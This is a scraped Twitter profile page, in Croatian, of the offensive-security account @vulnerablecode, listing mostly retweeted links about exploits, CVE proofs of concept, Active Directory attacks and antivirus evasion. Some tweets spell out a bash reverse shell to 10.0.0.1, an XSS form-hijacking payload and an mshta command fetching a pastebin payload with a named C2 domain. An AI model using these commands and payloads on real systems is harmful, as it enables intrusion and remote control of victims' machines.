vulncode

@vulnerablecode

ved sloot ces • ved tiolpxe • hcraeser nluv

Vrijeme pridruživanja: listopad 2018.

Tweetovi

Blokirali ste korisnika/cu @vulnerablecode

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @vulnerablecode

  1. Prikvačeni tweet
    8. lis 2019.
    Odgovor korisnicima

    Also if a person is sitting on 0days for fun, can reverse or diff a patch to write an exploit and she/he is *that* person in the room that waits til the end of the ctf to submit all flags for the win - then that person can call her/himself a hacker ;)

    Poništi
  2. proslijedio/la je Tweet
    1. velj

    Apple’s continuity protocol reverse enginered:

    Poništi
  3. proslijedio/la je Tweet
    1. velj

    After researching more than 30+ spy cameras, presents the structure and work principle of spy cameras and several effective ways to find all the hidden cameras in this Briefing

    Poništi
  4. proslijedio/la je Tweet
    29. sij

    AD Privilege Escalation Exploit: The Overlooked ACL

    Poništi
  5. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    30. sij
    Poništi
  7. proslijedio/la je Tweet
    30. sij

    Ever wanted to take a peek at the mimikatz sekurlsa::msv internals? New blog post is all about it plus, it also showcases PyKDumper, a tool that dumps LSASS credentials through WinDBG/PyKD.

    Poništi
  8. proslijedio/la je Tweet
    30. sij
    Poništi
  9. proslijedio/la je Tweet
    30. sij

    Two new videos: Exploitation of GraphQL () and exploitation of SVG XSS ()!!

    Poništi
  10. proslijedio/la je Tweet
    30. sij
    Poništi
  11. proslijedio/la je Tweet

    "/gitlab/*" endpoint is affected from the Jenkins Gitlab Hook Plugin Reflected XSS vulnerability. (CVE-2020-2096)

    Poništi
  12. proslijedio/la je Tweet
    29. sij
    Poništi
  13. proslijedio/la je Tweet
    29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    29. sij

    Finding and exploiting CVE-2018–7445 (unauthenticated RCE in MikroTik’s RouterOS SMB)

    Poništi
  15. proslijedio/la je Tweet
    28. sij

    Here's my PoC for CVE-2020-7980, a script to gain RCE (root level) to some Satellite controllers.

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    30. sij

    And two new videos covering Struts S2-045 exploitation () and PHPMailer RCE exploitation ()!!

    Poništi
  17. Poništi
  18. proslijedio/la je Tweet
    29. sij

    Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ? Obligatory disclaimer: Asking for a friend.

    Poništi
  19. proslijedio/la je Tweet
    28. sij

    Windows Defender got you feeling down? Here is a simple trick to load your meterpreter payloads past Windows Defender

    Poništi
  20. proslijedio/la je Tweet
    28. sij

    New blog (and tool): Attacking Azure, Azure AD, and Introducing PowerZure

    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    28. sij

    Some Lateral Movement Methods: -Pass the Hash/Relay ((Net-)NTLM) -Pass the Ticket (Silver/Golden) -RDP (Legit creds) -Remote Services (VNC/SSH) -(D)COM (Remote sched tasks, Services, WMI) -Remote Service Vuln (EB) -Admin Shares (PSExec) -Webshell (Chopper) -WinRM (PS Remoting)

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·